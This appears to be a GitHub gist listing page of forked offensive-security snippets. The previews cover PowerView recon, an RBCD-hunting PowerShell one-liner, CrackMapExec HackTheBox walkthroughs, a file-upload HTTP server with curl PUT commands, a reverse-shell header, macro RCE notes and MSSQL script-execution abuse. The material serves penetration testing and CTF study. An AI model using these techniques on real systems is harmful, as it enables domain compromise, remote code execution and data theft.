Support:
- Getting domain info
dannymas
dannymas
/ PowerView-3.0-tricks.ps1
Created
December 26, 2022 13:23
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
dannymas
/ Blackfield vs Crackmapexec.md
Created
November 2, 2022 21:50
— forked from mpgn/Blackfield vs NetExec .md
Blackfield vs Crackmapexec for fun and profit @mpgn_x64
dannymas
/ Scrambled vs Crackmapexec.md
Created
November 2, 2022 20:58
— forked from mpgn/Scrambled vs NetExec .md
Scrambled vs Crackmapexec for fun and profit by @mpgn_x64
Let pwn the box Scrambled from HackTheBox using only CrackMapExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:
smbclient won’t work, and I wasn’t able to get crackmapexec to work either.
To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with CME, 5 minutes and you get root :)
Note: I will pass the web part where we get one username : ksimpson
dannymas
/ Get-RBCD.ps1
Created
October 12, 2022 12:02
— forked from FatRodzianko/Get-RBCD.ps1
Use Powerview to find resource-based constrained delegation (RBCD) in active directory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get all sids, all computer object ACLs, and find RBCD!!! | |
| $usersid = get-domainuser | select -exp objectsid; "Got user SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $usersid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } } | |
| # Get all SIDS, all computer object ACLs, and find RBCD | |
| $groupsid = $groups = Get-DomainGroup | Where-Object {$_.SamAccountName -ne "Domain Admins" -and $_.SamAccountName -ne "Account Operators" -and $_.SamAccountName -ne "Enterprise Admins" -and $_.SamAccountName -ne "Administrators" -and $_.SamAccountName -ne "DnsAdmins" -and $_.SamAccountName -ne "Schema Admins" -and $_.SamAccountName -ne "Key Admins" -and $_.SamAccountName -ne "Enterprise Key Admins" -and $_.SamAccountName -ne "Storage |
dannymas
/ EtwStartWebClient.cs
Created
October 11, 2022 22:32
— forked from klezVirus/EtwStartWebClient.cs
A PoC in C# to enable WebClient Programmatically
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Runtime.InteropServices; | |
| using System; | |
| /* | |
| * Simple C# PoC to enable WebClient Service Programmatically | |
| * Based on the C++ version from @tirannido (James Forshaw) | |
| * Twitter: https://twitter.com/tiraniddo | |
| * URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html | |
| * | |
| * Compile with: |
dannymas
/ httpsrv.py
Created
June 30, 2022 20:16
— forked from darkr4y/httpsrv.py
python simple http server with upload & download
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """Extend Python's built in HTTP server to save files | |
| curl or wget can be used to send files with options similar to the following | |
| curl -X PUT --upload-file somefile.txt http://localhost:8000 | |
| wget -O- --method=PUT --body-file=somefile.txt http://localhost:8000/somefile.txt | |
| __Note__: curl automatically appends the filename onto the end of the URL so |
dannymas
/ DynWin32-ReverseShell.ps1
Created
January 29, 2022 17:32
— forked from qtc-de/DynWin32-ReverseShell.ps1
PowerShell reverse shell that uses dynamically resolved Win32 API functions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls. | |
| The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess. | |
| Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions | |
| from ws2_32.dll. | |
| This script should be used for educational purposes only (and maybe while playing CTF :D). | |
| It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only | |
| purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as |
dannymas
/ simple-https-server.py
Created
September 7, 2021 17:48
— forked from dergachev/simple-https-server.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
| # generate server.xml with the following command: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:4443 | |
| import BaseHTTPServer, SimpleHTTPServer | |
| import ssl |
dannymas
/ Various-Macro-Based-RCEs.md
Created
August 31, 2021 19:16
— forked from shantanu561993/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:
- Page substiution macro for luring user to click Enable Content
- The Unicorn Powershell based payload
dannymas
/ sp_execute_external_script_in_python.md
Created
August 21, 2021 14:32
— forked from james-otten/sp_execute_external_script_in_python.md
Executing Python inside MSSQL using sp_execute_external_script
MSSQL 2017 includes Microsoft Machine Learning Services, which allows for the execution of Python and R scripts within MSSQL via sp_execute_external_script. This is an expansion of the functionality available in MSSQL 2016, which allowed for the execution of R scripts with SQL Server R Services. Examples of how to abuse this functionality with R scripts are available elsewhere.
To execute Python code:
Machine Learning Services (In-Database)andPythonmust have been selected during installation- External scripts must be enabled
EXEC sp_configure 'external scripts enabled', 1RECONFIGURE WITH OVERRIDE- Restart the database server
- The user must have
EXECUTE ANY EXTERNAL SCRIPT
NewerOlder